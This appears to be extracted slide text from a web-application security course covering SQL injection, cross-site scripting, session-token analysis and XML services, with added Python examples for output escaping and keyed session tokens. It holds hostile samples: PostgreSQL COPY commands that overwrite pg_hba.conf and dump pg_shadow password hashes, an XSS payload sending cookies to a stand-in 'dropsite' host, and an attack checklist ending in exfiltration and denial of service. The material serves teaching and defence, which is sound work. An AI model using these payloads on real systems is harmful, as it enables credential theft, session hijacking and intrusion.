test=# COPY foo FROM '/var/lib/pgsql/data/pg_hba.conf';
test=# COPY foo TO '/var/lib/pgsql/data/pg_hba.conf';
test=# COPY foo TO '/tmp/table_data';
test=# COPY pg_shadow TO '/tmp/foo';

COPY ... TO the pg_hba.conf path overwrites the server's client
authentication rules; COPY pg_shadow TO a file writes out every
role's password hash.
51
MySQL PostgreSQL Protect the File System
  • Run the application (and the database) in a
    low-privilege account; this limits the exposure
    of important system configuration files and
    binaries.
  • Use chroot or jail environments.
  • Protect system files.

52
Putting It Together
  • Identify a vulnerable parameter. Test basic SQL
    injection characters such as %00, %27, and %3b.
    Examine errors for indicators of SQL injection.
  • Examine errors for information on database,
    table, and column names.
  • Query standard variables (version, file
    locations) for the type of database.
  • Determine system-specific users.
  • Determine database-specific users.
  • Determine application-specific users.
  • Query standard database objects (databases,
    tables, columns, stored procedures).
  • Record available databases, tables, columns, and
    known row values.
  • Query arbitrary data from application tables.
  • Use OR TRUE=TRUE clauses to bypass
    authentication.
  • Insert arbitrary data into standard database
    tables.
  • Insert arbitrary data into application tables.
  • Attempt to read and write files on the operating
    system.
  • Execute arbitrary commands on the database's host
    operating system.
  • Send files to an FTP, HTTP, or TFTP server or a
    netcat listener.
  • Write files to the web document root.
  • Overwrite important configuration files.
  • Denial of service (shut down the database or
    host, delete files, fill up disk space).

53
CROSS-SITE SCRIPTING
<script>alert("Hello world!")</script>
<script>alert(document.cookie)</script>
<script>document.location="http://dropsite/cookiemonster.cgi?"+document.cookie</script>
%3cscript%3edocument%2ecookie%3c/script%3e
<div style="background-image:url(javascript:alert('foo'))">
<img src="javascript:alert('foo')">
<img dynsrc="javascript:alert('foo')">
<img src="foo" alt="bar" onmouseover="javascript:alert('foo')">
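An added example, not code from the slides: the payloads above pushed through the two output controls a page needs, HTML-escaping for text and attribute values, and a scheme allowlist for any value that becomes a URL. Escaping alone does not neutralise a javascript: URL in src or background-image, which is why the second control exists. The template fragments and function names are constructed for the illustration.

```python
# Added example (not from the HackNotes slides). The render_* helpers and
# the allowlist policy are assumptions for the illustration.
import html
from urllib.parse import urlsplit

# Payloads from slide 53 (the last one assumes the value lands in an
# attribute and tries to break out of it).
PAYLOADS = [
    '<script>alert("Hello world!")</script>',
    '<script>alert(document.cookie)</script>',
    "javascript:alert('foo')",
    'foo" onmouseover="javascript:alert(\'foo\')',
]

def render_text(user_input):
    """Text between tags: escape &, <, >, and both quote characters."""
    return html.escape(user_input, quote=True)

def render_attr(name, user_input):
    """Attribute value: always double-quoted, always escaped, so a stray
    quote cannot close the attribute and start an onmouseover=."""
    return '%s="%s"' % (name, html.escape(user_input, quote=True))

def safe_url(user_input):
    """Allow only absolute http(s) URLs. javascript:, data:, vbscript: and
    anything with an unrecognised or missing scheme is replaced, never echoed."""
    scheme = urlsplit(user_input.strip()).scheme.lower()
    if scheme in ("http", "https"):
        return user_input
    return "about:blank"

def render_img(src, alt):
    """An <img> whose src and alt both come from the user."""
    return "<img %s %s>" % (render_attr("src", safe_url(src)),
                            render_attr("alt", alt))

if __name__ == "__main__":
    for p in PAYLOADS:
        print(render_text(p))
    print(render_img(PAYLOADS[2], PAYLOADS[3]))
```

Note that the allowlist is deliberately strict: relative URLs are refused as well, because a browser resolves "java\tscript:" and similar oddities in ways a scheme check on the raw string may not predict.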
54
TOKEN ANALYSIS
55
Finding Tokens
http://website:8000/LOGIN?sessionid=0&next=html/PatronAutho.html&bad=html/PatronAutho.html&entitylanginit=FALSE&entitylang=eng&entitynoPatron=FALSE
http://website/default.asp?SESSIONID=%7BFDCECD1C-835C-46A4-A20D-148AAF056E74%7D
http://website/article.php3?sid=20020303191829
http://website/cust.fl?rqst=customerservice&sess=guest
56
Encoded vs. Encrypted
  • Base64

Cookie: SXNBZG1pbj1GYWxzZQ==
(Base64-decodes to IsAdmin=False. The value is merely encoded, so the
client can re-encode IsAdmin=True and send it back.)
57
Encoded vs. Encrypted
  • One-Way Hash Algorithms

58
Encoded vs. Encrypted
  • Encryption

<input type="hidden" name="ccard" value="BLk1tCXYv6pEn2jqB6zorQ==">
<input type="hidden" name="ccard" value="8mMbh5LUvwEBa3NJeOwdmg==">
59
Pattern analysis
60
SESSION ATTACKS
Token                Description                                                                                                   Special Attacks
Incremental value    A counter used by the application to track something. This may be a current session, request number, reference to a temporary file, or other ephemeral value. It may be numeric or a string.   Varies.
Date and timestamp   A special case of incremental values. The timestamp always increases, regardless of new sessions and users. Most of the time it will consist of a long numeric string, or a 10-digit number if it is an epoch value. Formats: YYYYMMDDHHMMSS, MMDDHHMMSSYYYY.   Revalidate an old session ID. Bypass forced timeouts.
Static value         A value that does not change regardless of session, user, or time. This could be as simple as a language identifier (1033 for U.S. English) or a specific flag used by the application.   Input validation.
Pseudorandom value   This is most likely the session token.   Session hijacking.
Profile information  Look for values that the application has requested, such as first name, last name, e-mail address, mailing address, phone number, age, birthday, etc.   User impersonation. Access another user's information (horizontal privilege escalation).
Server IP address    The server embeds its own IP address in the cookie. The address could be the public IP address or an internal one. Look for four bytes in network order (big-endian) or little-endian format. Also check for hexadecimal and Base64 equivalents. For example, 192.168.0.1 could be either 0xC0A80001 or 0x0100A8C0.   Network enumeration.
Client IP address    The client's IP address is embedded in the cookie. Look for four bytes in network order (big-endian) or little-endian format. Also check for hexadecimal and Base64 equivalents; 192.168.0.1 could be either 0xC0A80001 or 0x0100A8C0.   Session hijacking.
Two-byte numbers     This may be a port number. Test the values to see   Network enumeration.
61
SESSION ATTACKS
  • Horizontal privilege escalation
  • Vertical privilege escalation
  • Attacking the session management process:
  • Find the state carrier
  • Decipher the state information
  • Replay the state information
  • Modify the state information

62
User Impersonation
63
Protect URL Parameters
64
Brute-Force Password Guessing
65
Password Protection
  • Lock the account after a certain number of failed
    logins (remember that an attacker can use the
    same lockout to deny service to legitimate
    users, so prefer temporary lockouts or
    throttling to permanent ones)
  • Re-authentication attempts should have a minimum
    time between them
  • Concurrent logins should be restricted
  • Inform the user that failed logins have occurred.

66
Spoofing and Replay
http://website/bad.cgi?user=foo&sessid=12345&redherring=
67
Protect the Session
Token Creation                  Description
timestamp + ID                  Insecure. The timestamp is trivial to modify and update to a valid window. A captured token may be replayed at any time.
3DES(timestamp + ID)            Secure. The application is able to decrypt the token in order to verify that the timestamp is within the valid window. A captured token may be replayed only within the time window. The token is vulnerable to an offline brute-force attack: if the attacker determines the initial timestamp and session ID, then it would be possible to determine the secret key used by the application to decrypt the token.
3DES(secret + timestamp + ID)   More secure. The addition of the secret (or salt) makes a successful brute-force attack more difficult because the attacker no longer has a known plaintext (timestamp + ID) to target. The secret should be rotated on a periodic basis.
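An added example, not code from the slides: the first row of the table above beside a keyed token that has the properties the 3DES rows describe (server-verifiable, expires with the window, cannot be forged or re-dated without the secret). It uses an HMAC over timestamp and ID from the standard library in place of the 3DES construction the slide names; the verification logic, not the primitive, is what the example shows. Key, window, session IDs and timestamps are constructed.

```python
# Added example (not from the HackNotes slides). HMAC-SHA256 stands in for
# the slide's 3DES construction; SECRET, WINDOW and the IDs are assumptions.
import hmac, hashlib, os

SECRET = os.urandom(32)   # per-deployment key; rotate it periodically
WINDOW = 900              # seconds a token stays valid

def insecure_token(session_id, now):
    """Table row 1: timestamp:ID in the clear."""
    return "%d:%s" % (now, session_id)

def insecure_verify(token, now):
    """The server checks the window, but the client wrote the timestamp."""
    ts, sid = token.split(":", 1)
    return sid if now - int(ts) <= WINDOW else None

def keyed_token(session_id, now, key=SECRET):
    """Rows 2-3: the server binds timestamp and ID with a secret key."""
    body = "%d:%s" % (now, session_id)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + ":" + tag

def keyed_verify(token, now, key=SECRET):
    """Returns the session ID only if the tag is genuine and the timestamp
    is inside the window; None for anything forged, edited or expired."""
    try:
        ts_str, sid, tag = token.split(":", 2)
        ts = int(ts_str)
    except ValueError:
        return None
    expected = hmac.new(key, (ts_str + ":" + sid).encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time compare
        return None
    if now - ts > WINDOW or ts > now + 60:       # expired, or from the future
        return None
    return sid

if __name__ == "__main__":
    t0 = 1700000000   # constructed clock value
    weak = insecure_token("abc", t0)
    print(insecure_verify("%d:abc" % (t0 + 100000), t0 + 100000))  # abc: re-dated
    strong = keyed_token("abc", t0)
    print(keyed_verify(strong, t0 + 10))             # abc
    print(keyed_verify(strong, t0 + WINDOW + 1))     # None: expired
```

Replay inside the window is still possible with either keyed scheme, exactly as the table states; binding the token to a server-side session record is what closes that gap.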
68
Session Correlation
  • Success
  • Failure
  • Error
  • Explicit Failure
  • Silent Failure
  • Re-authenticate
  • Success (Horizontal)
  • Success (Vertical)

69
XML-BASED SERVICES
<?xml version="1.0" encoding="UTF-8"?>
<definitions name="SecureContextEstablishmentDefinition"
    targetNamespace="http://someplace/authentication"
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:auth-bindings="http://someplace/authentication/authentication_bindings"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <import location="../security/authentication/bindings.wsdl"
      namespace="http://someplace/authentication/authentication_bindings" />
  <service name="SecureContextEstablishmentService">
    <documentation>Service used to establish a security context</documentation>
    <port binding="auth-bindings:SecureContextEstablishmentSOAPBinding"
        name="SecurityContextEstablishmentPort">
      <soap:address location="http://localhost:8080/services/"/>
    </port>
  </service>
</definitions>
70
Attacking XML
POST /foo/ViewProfile HTTP/1.0
Content-Type: text/xml
Content-length: 95

<?xml version="1.0"?>
<GetProfile>
  <ProfileName>Morgainne</ProfileName>
  <params/>
</GetProfile>
71
FUNDAMENTAL APPLICATION DEFENSES
72
INPUT VALIDATION
73
INPUT VALIDATION Perl Regex
74
INPUT VALIDATION .NET Regex Token
75
Directory Traversal and File Handling
76
Output Validation
77
SUMMARY